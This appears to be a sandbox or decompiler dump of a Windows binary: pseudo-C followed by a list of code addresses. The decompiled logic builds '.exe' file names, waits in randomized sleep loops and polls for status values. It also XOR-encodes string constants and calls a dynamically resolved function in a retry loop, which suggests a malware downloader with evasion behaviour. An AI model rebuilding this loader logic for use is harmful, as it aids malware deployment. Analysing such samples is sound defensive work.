																			__eflags = _t1630 - 0x1000;
																			if(_t1630 < 0x1000) {
																				L153:
																				_push(_t1630);
																				E0040EDFF(_t1503);
																				_t1716 = _t1716 + 8;
																				goto L154;
																			} else {
																				_t1360 =  *((intOrPtr*)(_t1503 - 4));
																				_t1557 = _t1630 + 0x23;
																				__eflags = _t1169 -  *((intOrPtr*)(_t1503 - 4)) + 0xfffffffc - 0x1f;
																				if(__eflags > 0) {
																					goto L313;
																				} else {
																					goto L153;
																				}
																			}
																		}
																	} else {
																		_t1504 = _v428;
																		_t1644 = _t1629 + 1;
																		_t1173 = _t1504;
																		__eflags = _t1644 - 0x1000;
																		if(_t1644 < 0x1000) {
																			L149:
																			_push(_t1644);
																			E0040EDFF(_t1504);
																			_t1716 = _t1716 + 8;
																			goto L150;
																		} else {
																			_t1360 =  *((intOrPtr*)(_t1504 - 4));
																			_t1557 = _t1644 + 0x23;
																			__eflags = _t1173 -  *((intOrPtr*)(_t1504 - 4)) + 0xfffffffc - 0x1f;
																			if(__eflags > 0) {
																				goto L313;
																			} else {
																				goto L149;
																			}
																		}
																	}
																} else {
																	_t1505 = _v476;
																	_t1645 = _t1628 + 1;
																	_t1177 = _t1505;
																	__eflags = _t1645 - 0x1000;
																	if(_t1645 < 0x1000) {
																		L145:
																		_push(_t1645);
																		E0040EDFF(_t1505);
																		_t1716 = _t1716 + 8;
																		goto L146;
																	} else {
																		_t1360 =  *((intOrPtr*)(_t1505 - 4));
																		_t1557 = _t1645 + 0x23;
																		__eflags = _t1177 -  *((intOrPtr*)(_t1505 - 4)) + 0xfffffffc - 0x1f;
																		if(__eflags > 0) {
																			goto L313;
																		} else {
																			goto L145;
																		}
																	}
																}
															} else {
																_push(_t1483);
																_t1189 = E0040C770( &_v428,  &_v396);
																_v16 = 0xf;
																_t1190 = E0040C990( &_v476, _t1189,  &_v348);
																_t1716 = _t1755 + 8;
																_t1510 = _t1190;
																_v16 = 0x10;
																_t1683 =  *(_t1510 + 0x14);
																_t1648 =  *(_t1510 + 0x10);
																__eflags = _t1683 - _t1648 - 4;
																if(_t1683 - _t1648 < 4) {
																	_v400 = 0;
																	_t1510 = E00402980(_t1309, _t1510, _t1683, _t1688, 4, _v400, ".exe", 4);
																} else {
																	 *(_t1510 + 0x10) = _t1648 + 4;
																	_t1210 = _t1510;
																	__eflags = _t1683 - 0x10;
																	if(_t1683 >= 0x10) {
																		_t1210 =  *_t1510;
																	}
																	 *((intOrPtr*)(_t1210 + _t1648)) = 0x6578652e;
																	 *((char*)(_t1210 + _t1648 + 4)) = 0;
																}
																 *_t1688 = 0;
																 *(_t1688 + 0x10) = 0;
																 *(_t1688 + 0x14) = 0;
																asm("movups xmm0, [ecx]");
																asm("movups [esi], xmm0");
																asm("movq xmm0, [ecx+0x10]");
																asm("movq [esi+0x10], xmm0");
																 *(_t1510 + 0x10) = 0;
																 *(_t1510 + 0x14) = 0xf;
																 *_t1510 = 0;
																_t1649 = _v456;
																__eflags = _t1649 - 0x10;
																if(_t1649 < 0x10) {
																	L120:
																	_t1650 = _v408;
																	_v460 = 0;
																	_v456 = 0xf;
																	_v476 = 0;
																	__eflags = _t1650 - 0x10;
																	if(_t1650 < 0x10) {
																		L124:
																		_t1651 = _v328;
																		_v412 = 0;
																		_v408 = 0xf;
																		_v428 = 0;
																		__eflags = _t1651 - 0x10;
																		if(_t1651 < 0x10) {
																			L128:
																			_t1652 = _v352;
																			_v332 = 0;
																			_v328 = 0xf;
																			_v348 = 0;
																			__eflags = _t1652 - 0x10;
																			if(__eflags < 0) {
																				goto L38;
																			} else {
																				_t1499 = _v372;
																				_t1640 = _t1652 + 1;
																				_t1194 = _t1499;
																				__eflags = _t1640 - 0x1000;
																				if(__eflags < 0) {
																					goto L37;
																				} else {
																					_t1360 =  *((intOrPtr*)(_t1499 - 4));
																					_t1557 = _t1640 + 0x23;
																					__eflags = _t1194 -  *((intOrPtr*)(_t1499 - 4)) + 0xfffffffc - 0x1f;
																					if(__eflags > 0) {
																						goto L313;
																					} else {
																						goto L37;
																					}
																				}
																			}
																		} else {
																			_t1511 = _v348;
																			_t1653 = _t1651 + 1;
																			_t1197 = _t1511;
																			__eflags = _t1653 - 0x1000;
																			if(_t1653 < 0x1000) {
																				L127:
																				_push(_t1653);
																				E0040EDFF(_t1511);
																				_t1716 = _t1716 + 8;
																				goto L128;
																			} else {
																				_t1360 =  *((intOrPtr*)(_t1511 - 4));
																				_t1557 = _t1653 + 0x23;
																				__eflags = _t1197 -  *((intOrPtr*)(_t1511 - 4)) + 0xfffffffc - 0x1f;
																				if(__eflags > 0) {
																					goto L313;
																				} else {
																					goto L127;
																				}
																			}
																		}
																	} else {
																		_t1512 = _v428;
																		_t1654 = _t1650 + 1;
																		_t1201 = _t1512;
																		__eflags = _t1654 - 0x1000;
																		if(_t1654 < 0x1000) {
																			L123:
																			_push(_t1654);
																			E0040EDFF(_t1512);
																			_t1716 = _t1716 + 8;
																			goto L124;
																		} else {
																			_t1360 =  *((intOrPtr*)(_t1512 - 4));
																			_t1557 = _t1654 + 0x23;
																			__eflags = _t1201 -  *((intOrPtr*)(_t1512 - 4)) + 0xfffffffc - 0x1f;
																			if(__eflags > 0) {
																				goto L313;
																			} else {
																				goto L123;
																			}
																		}
																	}
																} else {
																	_t1513 = _v476;
																	_t1655 = _t1649 + 1;
																	_t1205 = _t1513;
																	__eflags = _t1655 - 0x1000;
																	if(_t1655 < 0x1000) {
																		L119:
																		_push(_t1655);
																		E0040EDFF(_t1513);
																		_t1716 = _t1716 + 8;
																		goto L120;
																	} else {
																		_t1360 =  *((intOrPtr*)(_t1513 - 4));
																		_t1557 = _t1655 + 0x23;
																		__eflags = _t1205 -  *((intOrPtr*)(_t1513 - 4)) + 0xfffffffc - 0x1f;
																		if(__eflags > 0) {
																			goto L313;
																		} else {
																			goto L119;
																		}
																	}
																}
															}
														} else {
															_t1514 = _v452;
															_t1624 = _t1624 + 1;
															_t1211 = _t1514;
															__eflags = _t1624 - 0x1000;
															if(_t1624 < 0x1000) {
																L109:
																_push(_t1624);
																E0040EDFF(_t1514);
																_t1716 = _t1716 + 8;
																goto L110;
															} else {
																_t1360 =  *((intOrPtr*)(_t1514 - 4));
																_t1557 = _t1624 + 0x23;
																__eflags = _t1211 -  *((intOrPtr*)(_t1514 - 4)) + 0xfffffffc - 0x1f;
																if(__eflags > 0) {
																	goto L313;
																} else {
																	goto L109;
																}
															}
														}
													} else {
														_t1515 = _v428;
														_t1656 = _t1623 + 1;
														_t1215 = _t1515;
														__eflags = _t1656 - 0x1000;
														if(_t1656 < 0x1000) {
															L105:
															_push(_t1656);
															E0040EDFF(_t1515);
															_t1716 = _t1716 + 8;
															goto L106;
														} else {
															_t1360 =  *((intOrPtr*)(_t1515 - 4));
															_t1557 = _t1656 + 0x23;
															__eflags = _t1215 -  *((intOrPtr*)(_t1515 - 4)) + 0xfffffffc - 0x1f;
															if(__eflags > 0) {
																goto L313;
															} else {
																goto L105;
															}
														}
													}
												} else {
													_t1516 = _v476;
													_t1657 = _t1622 + 1;
													_t1219 = _t1516;
													__eflags = _t1657 - 0x1000;
													if(_t1657 < 0x1000) {
														L101:
														_push(_t1657);
														E0040EDFF(_t1516);
														_t1716 = _t1716 + 8;
														goto L102;
													} else {
														_t1360 =  *((intOrPtr*)(_t1516 - 4));
														_t1557 = _t1657 + 0x23;
														__eflags = _t1219 -  *((intOrPtr*)(_t1516 - 4)) + 0xfffffffc - 0x1f;
														if(__eflags > 0) {
															goto L313;
														} else {
															goto L101;
														}
													}
												}
											} else {
												_push(_t1474);
												_t1233 = E0040C770( &_v452,  &_v396);
												_v16 = 0xa;
												_t1234 = E0040C990( &_v428, _t1233,  &_v348);
												_t1716 = _t1752 + 8;
												_t1520 = _t1234;
												_v16 = 0xb;
												_t1683 =  *(_t1520 + 0x14);
												_t1660 =  *(_t1520 + 0x10);
												__eflags = _t1683 - _t1660 - 4;
												if(_t1683 - _t1660 < 4) {
													_v400 = 0;
													_t1520 = E00402980(_t1309, _t1520, _t1683, _t1688, 4, _v400, ".exe", 4);
												} else {
													 *(_t1520 + 0x10) = _t1660 + 4;
													_t1254 = _t1520;
													__eflags = _t1683 - 0x10;
													if(_t1683 >= 0x10) {
														_t1254 =  *_t1520;
													}
													 *((intOrPtr*)(_t1254 + _t1660)) = 0x6578652e;
													 *((char*)(_t1254 + _t1660 + 4)) = 0;
												}
												 *_t1688 = 0;
												 *(_t1688 + 0x10) = 0;
												 *(_t1688 + 0x14) = 0;
												asm("movups xmm0, [ecx]");
												asm("movups [esi], xmm0");
												asm("movq xmm0, [ecx+0x10]");
												asm("movq [esi+0x10], xmm0");
												 *(_t1520 + 0x10) = 0;
												 *(_t1520 + 0x14) = 0xf;
												 *_t1520 = 0;
												_t1661 = _v408;
												__eflags = _t1661 - 0x10;
												if(_t1661 < 0x10) {
													L75:
													_t1662 = _v432;
													_v412 = 0;
													_v408 = 0xf;
													_v428 = 0;
													__eflags = _t1662 - 0x10;
													if(_t1662 < 0x10) {
														L79:
														_t1663 = _v328;
														_v436 = 0;
														_v432 = 0xf;
														_v452 = 0;
														__eflags = _t1663 - 0x10;
														if(_t1663 < 0x10) {
															L83:
															_t1664 = _v352;
															_v332 = 0;
															_v328 = 0xf;
															_v348 = 0;
															__eflags = _t1664 - 0x10;
															if(__eflags < 0) {
																goto L38;
															} else {
																_t1499 = _v372;
																_t1640 = _t1664 + 1;
																_t1238 = _t1499;
																__eflags = _t1640 - 0x1000;
																if(__eflags < 0) {
																	goto L37;
																} else {
																	_t1360 =  *((intOrPtr*)(_t1499 - 4));
																	_t1557 = _t1640 + 0x23;
																	__eflags = _t1238 -  *((intOrPtr*)(_t1499 - 4)) + 0xfffffffc - 0x1f;
																	if(__eflags > 0) {
																		goto L313;
																	} else {
																		goto L37;
																	}
																}
															}
														} else {
															_t1521 = _v348;
															_t1665 = _t1663 + 1;
															_t1241 = _t1521;
															__eflags = _t1665 - 0x1000;
															if(_t1665 < 0x1000) {
																L82:
																_push(_t1665);
																E0040EDFF(_t1521);
																_t1716 = _t1716 + 8;
																goto L83;
															} else {
																_t1360 =  *((intOrPtr*)(_t1521 - 4));
																_t1557 = _t1665 + 0x23;
																__eflags = _t1241 -  *((intOrPtr*)(_t1521 - 4)) + 0xfffffffc - 0x1f;
																if(__eflags > 0) {
																	goto L313;
																} else {
																	goto L82;
																}
															}
														}
													} else {
														_t1522 = _v452;
														_t1666 = _t1662 + 1;
														_t1245 = _t1522;
														__eflags = _t1666 - 0x1000;
														if(_t1666 < 0x1000) {
															L78:
															_push(_t1666);
															E0040EDFF(_t1522);
															_t1716 = _t1716 + 8;
															goto L79;
														} else {
															_t1360 =  *((intOrPtr*)(_t1522 - 4));
															_t1557 = _t1666 + 0x23;
															__eflags = _t1245 -  *((intOrPtr*)(_t1522 - 4)) + 0xfffffffc - 0x1f;
															if(__eflags > 0) {
																goto L313;
															} else {
																goto L78;
															}
														}
													}
												} else {
													_t1523 = _v428;
													_t1667 = _t1661 + 1;
													_t1249 = _t1523;
													__eflags = _t1667 - 0x1000;
													if(_t1667 < 0x1000) {
														L74:
														_push(_t1667);
														E0040EDFF(_t1523);
														_t1716 = _t1716 + 8;
														goto L75;
													} else {
														_t1360 =  *((intOrPtr*)(_t1523 - 4));
														_t1557 = _t1667 + 0x23;
														__eflags = _t1249 -  *((intOrPtr*)(_t1523 - 4)) + 0xfffffffc - 0x1f;
														if(__eflags > 0) {
															goto L313;
														} else {
															goto L74;
														}
													}
												}
											}
										} else {
											_t1524 = _v324;
											_t1618 =  &(1[_t1618]);
											_t1255 = _t1524;
											__eflags = _t1618 - 0x1000;
											if(_t1618 < 0x1000) {
												L64:
												_push(_t1618);
												E0040EDFF(_t1524);
												_t1716 = _t1716 + 8;
												goto L65;
											} else {
												_t1360 =  *((intOrPtr*)(_t1524 - 4));
												_t1557 = _t1618 + 0x23;
												__eflags = _t1255 -  *((intOrPtr*)(_t1524 - 4)) + 0xfffffffc - 0x1f;
												if(__eflags > 0) {
													goto L314;
												} else {
													goto L64;
												}
											}
										}
									} else {
										_t1525 = _v452;
										_t1668 = _t1617 + 1;
										_t1259 = _t1525;
										__eflags = _t1668 - 0x1000;
										if(_t1668 < 0x1000) {
											L60:
											_push(_t1668);
											E0040EDFF(_t1525);
											_t1716 = _t1716 + 8;
											goto L61;
										} else {
											_t1360 =  *((intOrPtr*)(_t1525 - 4));
											_t1557 = _t1668 + 0x23;
											__eflags = _t1259 -  *((intOrPtr*)(_t1525 - 4)) + 0xfffffffc - 0x1f;
											if(__eflags > 0) {
												goto L314;
											} else {
												goto L60;
											}
										}
									}
								} else {
									_t1526 = _v428;
									_t1669 = _t1616 + 1;
									_t1263 = _t1526;
									__eflags = _t1669 - 0x1000;
									if(_t1669 < 0x1000) {
										L56:
										_push(_t1669);
										E0040EDFF(_t1526);
										_t1716 = _t1716 + 8;
										goto L57;
									} else {
										_t1360 =  *((intOrPtr*)(_t1526 - 4));
										_t1557 = _t1669 + 0x23;
										__eflags = _t1263 -  *((intOrPtr*)(_t1526 - 4)) + 0xfffffffc - 0x1f;
										if(__eflags > 0) {
											goto L314;
										} else {
											goto L56;
										}
									}
								}
							} else {
								_push(_t1465);
								_t1275 = E0040C770( &_v452,  &_v396);
								_v16 = 5;
								_t1276 = E0040C990( &_v428, _t1275,  &_v348);
								_t1716 = _t1749 + 8;
								_t1530 = _t1276;
								_v16 = 6;
								_t1683 =  *(_t1530 + 0x14);
								_t1672 =  *(_t1530 + 0x10);
								if(_t1683 - _t1672 < 4) {
									_v400 = 0;
									_t1530 = E00402980(_t1309, _t1530, _t1683, _t1688, 4, _v400, ".exe", 4);
								} else {
									 *(_t1530 + 0x10) = _t1672 + 4;
									_t1296 = _t1530;
									if(_t1683 >= 0x10) {
										_t1296 =  *_t1530;
									}
									 *((intOrPtr*)(_t1296 + _t1672)) = 0x6578652e;
									 *((char*)(_t1296 + _t1672 + 4)) = 0;
								}
								 *_t1688 = 0;
								 *(_t1688 + 0x10) = 0;
								 *(_t1688 + 0x14) = 0;
								asm("movups xmm0, [ecx]");
								asm("movups [esi], xmm0");
								asm("movq xmm0, [ecx+0x10]");
								asm("movq [esi+0x10], xmm0");
								 *(_t1530 + 0x10) = 0;
								 *(_t1530 + 0x14) = 0xf;
								 *_t1530 = 0;
								_t1673 = _v408;
								if(_t1673 < 0x10) {
									L26:
									_t1674 = _v432;
									_v412 = 0;
									_v408 = 0xf;
									_v428 = 0;
									if(_t1674 < 0x10) {
										L30:
										_t1675 = _v328;
										_v436 = 0;
										_v432 = 0xf;
										_v452 = 0;
										if(_t1675 < 0x10) {
											L34:
											_t1676 = _v352;
											_v332 = 0;
											_v328 = 0xf;
											_v348 = 0;
											if(_t1676 < 0x10) {
												L38:
												_v356 = 0;
												_v352 = 0xf;
												_v372 = 0;
												L39:
												_t1557 = _v376;
												if(_t1557 < 0x10) {
													L311:
													 *[fs:0x0] = _v24;
													_pop(_t1684);
													_pop(_t1689);
													return E0040EBBF(_t1688, _t1309, _v32 ^ _t1698, _t1557, _t1684, _t1689);
												} else {
													_t1435 = _v396;
													_t1557 =  &(1[_t1557]);
													_t990 = _t1435;
													if(_t1557 < 0x1000) {
														L274:
														_push(_t1557);
														E0040EDFF(_t1435);
														goto L311;
													} else {
														_t1360 =  *((intOrPtr*)(_t1435 - 4));
														_t1557 = _t1557 + 0x23;
														if(_t990 -  *((intOrPtr*)(_t1435 - 4)) + 0xfffffffc > 0x1f) {
															goto L313;
														} else {
															goto L274;
														}
													}
												}
											} else {
												_t1499 = _v372;
												_t1640 = _t1676 + 1;
												_t1280 = _t1499;
												if(_t1640 < 0x1000) {
													L37:
													_push(_t1640);
													E0040EDFF(_t1499);
													_t1716 = _t1716 + 8;
													goto L38;
												} else {
													_t1360 =  *((intOrPtr*)(_t1499 - 4));
													_t1557 = _t1640 + 0x23;
													if(_t1280 -  *((intOrPtr*)(_t1499 - 4)) + 0xfffffffc > 0x1f) {
														goto L313;
													} else {
														goto L37;
													}
												}
											}
										} else {
											_t1531 = _v348;
											_t1677 = _t1675 + 1;
											_t1283 = _t1531;
											if(_t1677 < 0x1000) {
												L33:
												_push(_t1677);
												E0040EDFF(_t1531);
												_t1716 = _t1716 + 8;
												goto L34;
											} else {
												_t1360 =  *((intOrPtr*)(_t1531 - 4));
												_t1557 = _t1677 + 0x23;
												if(_t1283 -  *((intOrPtr*)(_t1531 - 4)) + 0xfffffffc > 0x1f) {
													goto L313;
												} else {
													goto L33;
												}
											}
										}
									} else {
										_t1532 = _v452;
										_t1678 = _t1674 + 1;
										_t1287 = _t1532;
										if(_t1678 < 0x1000) {
											L29:
											_push(_t1678);
											E0040EDFF(_t1532);
											_t1716 = _t1716 + 8;
											goto L30;
										} else {
											_t1360 =  *((intOrPtr*)(_t1532 - 4));
											_t1557 = _t1678 + 0x23;
											if(_t1287 -  *((intOrPtr*)(_t1532 - 4)) + 0xfffffffc > 0x1f) {
												goto L313;
											} else {
												goto L29;
											}
										}
									}
								} else {
									_t1533 = _v428;
									_t1679 = _t1673 + 1;
									_t1291 = _t1533;
									if(_t1679 < 0x1000) {
										L25:
										_push(_t1679);
										E0040EDFF(_t1533);
										_t1716 = _t1716 + 8;
										goto L26;
									} else {
										_t1360 =  *((intOrPtr*)(_t1533 - 4));
										_t1557 = _t1679 + 0x23;
										if(_t1291 -  *((intOrPtr*)(_t1533 - 4)) + 0xfffffffc > 0x1f) {
											goto L313;
										} else {
											goto L25;
										}
									}
								}
							}
						} else {
							_t1534 = _v476;
							_t1612 = _t1612 + 1;
							_t1297 = _t1534;
							if(_t1612 < 0x1000) {
								L15:
								_push(_t1612);
								E0040EDFF(_t1534);
								_t1716 = _t1716 + 8;
								goto L16;
							} else {
								_t1360 =  *((intOrPtr*)(_t1534 - 4));
								_t1557 = _t1612 + 0x23;
								if(_t1297 -  *((intOrPtr*)(_t1534 - 4)) + 0xfffffffc > 0x1f) {
									goto L312;
								} else {
									goto L15;
								}
							}
						}
					} else {
						_t1535 = _v428;
						_t1680 = _t1611 + 1;
						_t1302 = _t1535;
						if(_t1680 < 0x1000) {
							L11:
							_push(_t1680);
							E0040EDFF(_t1535);
							_t1716 = _t1716 + 8;
							goto L12;
						} else {
							_t1360 =  *((intOrPtr*)(_t1535 - 4));
							_t1557 = _t1680 + 0x23;
							if(_t1302 -  *((intOrPtr*)(_t1535 - 4)) + 0xfffffffc > 0x1f) {
								L312:
								E00413527(_t1309, _t1557, __eflags);
								L313:
								E00413527(_t1309, _t1557, __eflags);
								L314:
								E00413527(_t1309, _t1557, __eflags);
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								_push(_t1698);
								_t1700 = _t1716;
								_push(0xffffffff);
								_push(0x42ca27);
								_push( *[fs:0x0]);
								_t1724 = _t1716 - 0x4dc;
								_t870 =  *0x43d054; // 0x7bd02ead
								_t871 = _t870 ^ _t1700;
								_v508 = _t871;
								_push(_t1309);
								_push(_t1688);
								_push(_t1683);
								_push(_t871);
								 *[fs:0x0] =  &_v504;
								_v496 = 0;
								_t873 = E00405F40(_t1309, _t1683); // executed
								_t1311 = Sleep;
								__eflags = _t873;
								if(__eflags != 0) {
									_t1688 = 0x7d0;
									do {
										_t960 = E00417DF6(_t1360, __eflags);
										asm("cdq");
										_t1557 = _t960 % 0x7d0 + 0x3e8;
										Sleep(_t960 % 0x7d0 + 0x3e8);
										__eflags = E00405F40(Sleep, _t1683);
									} while (__eflags != 0);
								}
								E00401960( &_v760, "1"); // executed
								_v20 = 1;
								_t877 = E00402510( &_v1152, E0040B8F0(E00409340(_t1311, _t1557, _t1683, _t1688)));
								_v20 = 2;
								_t880 = E00402510( &_v1128, E0040B800(E00409290(_t1557, _t877, _t1688)));
								_v20 = 3;
								L352();
								_t882 = E00402510( &_v1272, E0040B7D0(_t880));
								_v20 = 4;
								_t883 = E0040C930( &_v1248, 0x450e3c, _t882);
								_v20 = 5;
								_t884 = E0040C990( &_v1224, _t883,  &_v8);
								_v20 = 6;
								_t885 = E0040CA40( &_v1200, _t884, _t880);
								_v20 = 7;
								_t886 = E0040CA40( &_v1176, _t885, _t877);
								_v20 = 8;
								E0040C990( &_v104, _t886, 0x450e24);
								_t1730 = _t1724 - 0x10 + 0x14;
								E00402440(_t1311,  &_v1176);
								E00402440(_t1311,  &_v1200);
								E00402440(_t1311,  &_v1224);
								E00402440(_t1311,  &_v1248);
								E00402440(_t1311,  &_v1272);
								E00402440(_t1311,  &_v1128);
								_v20 = 0x10;
								E00402440(_t1311,  &_v1152);
								_t1691 = 0;
								__eflags = 0;
								_t1686 = 0xc8;
								while(1) {
									_t1691 =  &(1[_t1691]);
									_t895 = E00402400( &_v104);
									_t1382 =  &_v760;
									_t896 = E00402300(_t1311,  &_v760, _t1686, _t895); // executed
									__eflags = _t896;
									if(_t896 == 0) {
										goto L323;
									}
									E00402510( &_v56, E00402370( &_v760));
									_t1569 = "0";
									_t905 = E00402800( &_v56, "0");
									__eflags = _t905;
									if(_t905 == 0) {
										_t1569 = "1";
										_t958 = E00402800( &_v56, "1");
										__eflags = _t958;
										if(_t958 == 0) {
											_t1382 =  &_v56;
											E00402440(_t1311,  &_v56);
											goto L323;
										}
									}
									E00402440(_t1311,  &_v56);
									E0040BB70( &_v80);
									_t1731 = _t1730 - 0x10;
									_v20 = 0x11;
									E00401960( &_v1088, "0"); // executed
									_v20 = 0x12;
									while(1) {
										_t911 = E00402510( &_v1128, E0040B8C0(E004093D0(_t1311, _t1569, _t1686, _t1691)));
										_t1569 = 0x450e54;
										_v20 = 0x15;
										_t912 = E0040C930( &_v1152, 0x450e54, _t911);
										_t1731 = _t1731 + 4;
										_v20 = 0x16;
										_t914 = E00402300(_t1311,  &_v1088, _t1686, E00402400(_t912)); // executed
										_t1691 = _t914;
										E00402440(_t1311,  &_v1152);
										_v20 = 0x12;
										E00402440(_t1311,  &_v1128);
										__eflags = _t914;
										if(_t914 == 0) {
											goto L330;
										}
										E00402410( &_v80, E00402370( &_v1088));
										_t919 = E004023F0( &_v80);
										__eflags = _t919 - 0xa;
										if(_t919 <= 0xa) {
											goto L330;
										}
										__eflags = _t919 - 0x64;
										if(_t919 >= 0x64) {
											goto L330;
										}
										_t1732 = _t1731 - 0x10;
										_t1692 = 0;
										__eflags = 0;
										E00401960( &_v432, "1"); // executed
										_v20 = 0x17;
										do {
											_v1104 = _t1692 + 1;
											_t923 = E00402510( &_v1128, E0040B7A0(E00409460(_t1569, _t1686, _t1692 + 1)));
											_t1569 = 0x450e54;
											_v20 = 0x1a;
											_t924 = E0040C930( &_v1152, 0x450e54, _t923);
											_t1732 = _t1732 + 4;
											_v20 = 0x1b;
											_t926 = E00402300(_t1311,  &_v432, _t1686, E00402400(_t924)); // executed
											E00402440(_t1311,  &_v1152);
											_v20 = 0x17;
											E00402440(_t1311,  &_v1128);
											__eflags = _t926;
											if(_t926 == 0) {
												goto L335;
											} else {
												_t1311 = E00402380( &_v432);
												__eflags = _t1311 - 0x16;
												if(__eflags <= 0) {
													goto L335;
												} else {
													_push( ~(0 | __eflags > 0x00000000) |  &(1[_t1311]));
													_t942 = E004162EE();
													_t766 =  &(1[_t1311]); // 0x1
													_t1686 = _t942;
													_t943 = E00402340( &_v432, _t942, _t766);
													_push( ~(0 | __eflags > 0x00000000) | _t1311 * 0x00000002); // executed
													_t946 = E004162EE(); // executed
													_t1738 = _t1732 + 4 - 0x14;
													_v1092 = _t946;
													E0040BB90(_t1311, _t1738, _t1311 * 2 >> 0x20, _t942,  &_v80);
													_t950 = E00403770(_t1311, _t942, _t943, _t1686,  &_v1092); // executed
													_t1569 = _t950;
													_t951 = E00402B60(_v1092, _t950, __eflags,  &_v1100,  &_v1100); // executed
													_t1732 = _t1738 + 0x24;
													_v1096 = _t951;
													__eflags = _v1100;
													if(_v1100 != 0) {
														_t1686 = Sleep;
														_t1692 = 0;
														_v1092 = 0;
														_t1311 = 0;
														__eflags = 0;
														do {
															_t1425 = _v1096(E00402400(0x450e6c), E00402400(0x450df4));
															_t1732 = _t1732 + 8;
															_t955 = _v1092;
															_t1569 = 1;
															__eflags = _t955;
															if(_t955 != 0) {
																__eflags = _t1425;
																_t1311 =  ==  ? 1 : _t1311 & 0x000000ff;
															}
															__eflags = _t1692 - 0xa;
															if(_t1692 >= 0xa) {
																__eflags = _t1425 - 1;
																_t1311 =  !=  ? _t1569 : _t1311 & 0x000000ff;
															}
															__eflags = _t1692 - 0xf;
															if(_t1692 < 0xf) {
																__eflags = _t1692 - 5;
																if(_t1692 < 5) {
																	goto L348;
																} else {
																	goto L346;
																}
															} else {
																__eflags = _t1425 - 1;
																if(_t1425 == 1) {
																	_t1311 = _t1425;
																}
																L346:
																__eflags = _t955;
																if(_t955 != 0) {
																	goto L348;
																} else {
																	__eflags = _t1425 - 0xfffffffe;
																	if(__eflags == 0) {
																		Sleep(0x7d0); // executed
																	} else {
																		goto L348;
																	}
																}
															}
															goto L351;
															L348:
															__eflags = _t1425 - 1;
															_t957 =  ==  ? _t1569 : _t955 & 0x000000ff;
															_t1692 = _t1692 + 1;
															_v1092 =  ==  ? _t1569 : _t955 & 0x000000ff;
															Sleep(0x7d0); // executed
															__eflags = _t1311;
														} while (__eflags == 0);
													} else {
														goto L335;
													}
												}
											}
											L351:
											E004054C0(_t1311, __eflags); // executed
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											asm("int3");
											_push(_t1700);
											_t1701 = _t1732;
											_t930 =  *0x43d054; // 0x7bd02ead
											_v1772 = _t930 ^ _t1701;
											_v1788 = 0x5a405b41;
											_v1784 = 0x5e465e00;
											_v1780 = 0x4c5b5d11;
											_t1407 =  *( *[fs:0x2c]);
											_t933 =  *0x450f38; // 0x80000017
											_v1776 = 0x2e13;
											__eflags = _t933 -  *((intOrPtr*)(_t1407 + 4));
											if(_t933 >  *((intOrPtr*)(_t1407 + 4))) {
												E0040EF48(_t933, 0x450f38);
												__eflags =  *0x450f38 - 0xffffffff;
												if(__eflags == 0) {
													asm("movaps xmm0, [0x439d70]");
													asm("movups [0x450db0], xmm0");
													 *0x450dc8 = _v32;
													asm("movq xmm0, [ebp-0x14]");
													asm("movq [0x450dc0], xmm0");
													 *0x450dcc = _v28;
													E0040F25B(_t1407, __eflags, 0x42d490);
													E0040EEFE(0x450f38);
												}
											}
											__eflags = _v24 ^ _t1701;
											return E0040EBBF(0x450db0, _t1311, _v24 ^ _t1701, _t1569, _t1686, _t1692);
											goto L356;
											L335:
											_t1692 = _v1104;
											__eflags = _t1692 - 0xa;
										} while (__eflags < 0);
										goto L351;
										L330:
										Sleep(0xbb8);
									}
									L323:
									__eflags = _t1691 - 0x12c;
									if(__eflags <= 0) {
										_t735 = _t1691 + 3; // 0x4
										Sleep(_t735 * 0x3e8);
									} else {
										_t899 = E00417DF6(_t1382, __eflags);
										asm("cdq");
										Sleep((_t899 % _t1686 + 0x67) * 0x3e8);
									}
								}
							} else {
								goto L11;
							}
						}
					}
				}
				L356:
			}

0x00406aa0
0x00406aa1
0x00406aa9
0x00406ab0
0x00406ab4
0x00406ab6
0x00406ab8
0x00406ac3
0x00406ac4
0x00406ac5
0x00406acb
0x00406ad0
0x00406ad2
0x00406ad5
0x00406ad6
0x00406ad7
0x00406adb
0x00406ae1
0x00406ae3
0x00406ae9
0x00406aef
0x00406af9
0x00406b03
0x00406b0d
0x00406b14
0x00406b1b
0x00406b22
0x00407e4e
0x00407e53
0x00407e57
0x00407e5c
0x00407e6d
0x00407e72
0x00407e7c
0x00407e83
0x00407e85
0x00407e8a
0x00407e90
0x00407e97
0x00407e9c
0x00407e9f
0x00407ea6
0x00407ea8
0x00407eba
0x00407ec1
0x00407ec6
0x00407ed3
0x00407ed8
0x00407ed8
0x00407ea6
0x00407edb
0x00407ee0
0x00407ee2
0x00407ee4
0x00407eed
0x00407ef4
0x00407ef8
0x00407efd
0x00407efd
0x00407f04
0x00407f09
0x00407f13
0x00407f1d
0x00407f27
0x00407f2e
0x00407f2e
0x00407f31
0x00407f31
0x00407f33
0x00407f34
0x00407f34
0x00407f46
0x00407f4b
0x00407f4f
0x00407f57
0x00407f5f
0x00407f62
0x00407f92
0x00407fa7
0x00407f64
0x00407f64
0x00407f67
0x00407f6a
0x00407f76
0x00407f7d
0x00407f83
0x00407f83
0x00407fac
0x00407fb6
0x00407fc0
0x00407fca
0x00407fcd
0x00407fd4
0x00407fd9
0x00407fe1
0x00407fe8
0x00407fef
0x00407ff8
0x00408009
0x0040800e
0x00408018
0x0040801d
0x00408023
0x00408026
0x00408057
0x00408057
0x0040805b
0x00408061
0x0040806b
0x00408075
0x0040807c
0x0040807f
0x004080b0
0x004080b0
0x004080b4
0x004080ba
0x004080c4
0x004080ce
0x004080d5
0x004080d8
0x00408109
0x00408109
0x00408114
0x0040811b
0x00408120
0x00408123
0x0040812d
0x00408130
0x00408135
0x00408139
0x0040813e
0x00408141
0x00408143
0x00408356
0x0040835b
0x00408365
0x0040836f
0x00408379
0x00408382
0x00408389
0x0040838f
0x00408396
0x0040839b
0x0040839e
0x004083a5
0x004083ad
0x004083b5
0x004083c1
0x004083d2
0x004083da
0x004083df
0x004083ec
0x004083f1
0x004083f1
0x004083a5
0x004083f4
0x004083fb
0x004083fd
0x004083fd
0x00408400
0x00408400
0x00408407
0x00408408
0x00408408
0x00408400
0x0040840d
0x00408412
0x0040841c
0x00408426
0x00408430
0x00408437
0x00408437
0x0040843a
0x00408440
0x00408440
0x00408442
0x00408443
0x00408443
0x00408455
0x0040845a
0x0040845e
0x00408466
